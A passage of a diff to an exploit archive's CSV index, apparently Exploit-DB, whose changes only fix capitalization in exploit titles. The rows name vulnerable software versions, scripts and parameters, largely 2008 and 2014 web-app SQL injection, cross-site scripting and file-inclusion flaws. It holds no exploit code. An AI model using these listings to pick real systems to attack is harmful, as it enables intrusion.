31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component - SQL Injection",2008-06-22,His0k4,php,webapps,0 @@ -28818,16 +28819,16 @@ id,file,description,date,author,platform,type,port 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 -32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 +32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 32048,platforms/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id Parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 -32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote,0 +32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote,0 31975,platforms/php/webapps/31975.txt,"The Rat CMS - viewarticle.php Multiple Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31976,platforms/php/webapps/31976.txt,"The Rat CMS - viewarticle2.php id Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31977,platforms/php/webapps/31977.txt,"The Rat CMS - viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 @@ -28838,10 +28839,10 @@ id,file,description,date,author,platform,type,port 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 -31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 +31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy Parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 @@ -28867,7 +28868,7 @@ id,file,description,date,author,platform,type,port 32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 -32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 +32016,platforms/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - admincp/faq.php Injection adminlog.php Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos,0 @@ -28875,19 +28876,19 @@ id,file,description,date,author,platform,type,port 32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 -32024,platforms/php/webapps/32024.txt,"V-webmail 1.6.4 - includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32025,platforms/php/webapps/32025.txt,"V-webmail 1.6.4 - includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32026,platforms/php/webapps/32026.txt,"V-webmail 1.6.4 - includes/pear/XML/parser.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32027,platforms/php/webapps/32027.txt,"V-webmail 1.6.4 - includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32028,platforms/php/webapps/32028.txt,"V-webmail 1.6.4 - includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32029,platforms/php/webapps/32029.txt,"V-webmail 1.6.4 - includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32030,platforms/php/webapps/32030.txt,"V-webmail 1.6.4 - includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32031,platforms/php/webapps/32031.txt,"V-webmail 1.6.4 - includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32032,platforms/php/webapps/32032.txt,"V-webmail 1.6.4 - includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32033,platforms/php/webapps/32033.txt,"V-webmail 1.6.4 - includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32034,platforms/php/webapps/32034.txt,"V-webmail 1.6.4 - includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32035,platforms/php/webapps/32035.txt,"V-webmail 1.6.4 - includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32036,platforms/php/webapps/32036.txt,"V-webmail 1.6.4 - includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32024,platforms/php/webapps/32024.txt,"V-Webmail 1.6.4 - includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32025,platforms/php/webapps/32025.txt,"V-Webmail 1.6.4 - includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32026,platforms/php/webapps/32026.txt,"V-Webmail 1.6.4 - includes/pear/XML/parser.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32027,platforms/php/webapps/32027.txt,"V-Webmail 1.6.4 - includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32028,platforms/php/webapps/32028.txt,"V-Webmail 1.6.4 - includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32029,platforms/php/webapps/32029.txt,"V-Webmail 1.6.4 - includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32030,platforms/php/webapps/32030.txt,"V-Webmail 1.6.4 - includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32031,platforms/php/webapps/32031.txt,"V-Webmail 1.6.4 - includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32032,platforms/php/webapps/32032.txt,"V-Webmail 1.6.4 - includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32033,platforms/php/webapps/32033.txt,"V-Webmail 1.6.4 - includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 @@ -28896,11 +28897,11 @@ id,file,description,date,author,platform,type,port 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0 32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection",2008-08-21,r45c4l,php,webapps,0 -32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New - ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 +32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 32052,platforms/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 -32053,platforms/php/webapps/32053.txt,"Wordpress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 +32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0 32055,platforms/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local,0 32056,platforms/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos,0 @@ -28919,7 +28920,7 @@ id,file,description,date,author,platform,type,port 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 -32074,platforms/windows/local/32074.rb,"ALLPlayer - .m3u Buffer Overflow",2014-03-05,Metasploit,windows,local,0 +32074,platforms/windows/local/32074.rb,"ALLPlayer - '.m3u' Buffer Overflow",2014-03-05,Metasploit,windows,local,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 @@ -28959,7 +28960,7 @@ id,file,description,date,author,platform,type,port 32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'username' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 32115,platforms/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 -32116,platforms/php/webapps/32116.txt,"ezContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 +32116,platforms/php/webapps/32116.txt,"EZContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,php,webapps,0 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - admin_group_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 @@ -28971,10 +28972,10 @@ id,file,description,date,author,platform,type,port 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0 32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service / Memory Corruption",2008-07-30,"Luigi Auriemma",multiple,dos,0 -32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0 -32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - .PLF File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 +32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0 +32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 -32136,platforms/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 +32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 32137,platforms/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 @@ -28998,7 +28999,7 @@ id,file,description,date,author,platform,type,port 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php filename parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php Filename Parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 @@ -29015,22 +29016,22 @@ id,file,description,date,author,platform,type,port 32176,platforms/php/webapps/32176.txt,"Softbiz Image Gallery - changepassword.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery - cleanup.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery - browsecats.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps,0 +32179,platforms/php/webapps/32179.txt,"POWERGAP ShopSystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps,0 32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusion",2008-08-06,casper41,php,webapps,0 32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection",2008-08-06,"Khashayar Fereidani",php,webapps,0 32182,platforms/php/webapps/32182.txt,"PHPKF-Portal 1.10 - baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32183,platforms/php/webapps/32183.txt,"PHPKF-Portal 1.10 - anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - order.asp page Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 -32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - search.asp filename Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 +32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - search.asp Filename Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 -32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0 +32187,platforms/php/webapps/32187.txt,"com_utchat Component Mambo and Joomla! Component 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0 32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' Parameter SQL Injection",2008-08-06,Lovebug,php,webapps,0 32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0 -32194,platforms/multiple/dos/32194.txt,"NoticeWare Email Server 4.6 - NG LOGIN Messages Denial Of Service",2008-08-06,Antunes,multiple,dos,0 +32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial Of Service",2008-08-06,Antunes,multiple,dos,0 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0 32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0 32197,platforms/windows/remote/32197.pl,"Maxthon Browser 1.x - Content-Type Buffer Overflow",2008-08-09,DATA_SNIPER,windows,remote,0 @@ -29049,7 +29050,7 @@ id,file,description,date,author,platform,type,port 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file parameter) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 +32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 @@ -29062,7 +29063,7 @@ id,file,description,date,author,platform,type,port 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 32228,platforms/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",linux,remote,0 -32229,platforms/windows/dos/32229.txt,"hMailServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0 +32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0 32230,platforms/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps,0 32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 - modules.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32232,platforms/php/webapps/32232.txt,"Meet#Web 0.8 - ManagerResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 @@ -29089,7 +29090,7 @@ id,file,description,date,author,platform,type,port 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 -32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29152,20 +29153,20 @@ id,file,description,date,author,platform,type,port 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 -32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 +32334,platforms/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 - Security Bypass",2008-09-08,"Marc Ruef",hardware,remote,0 32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple 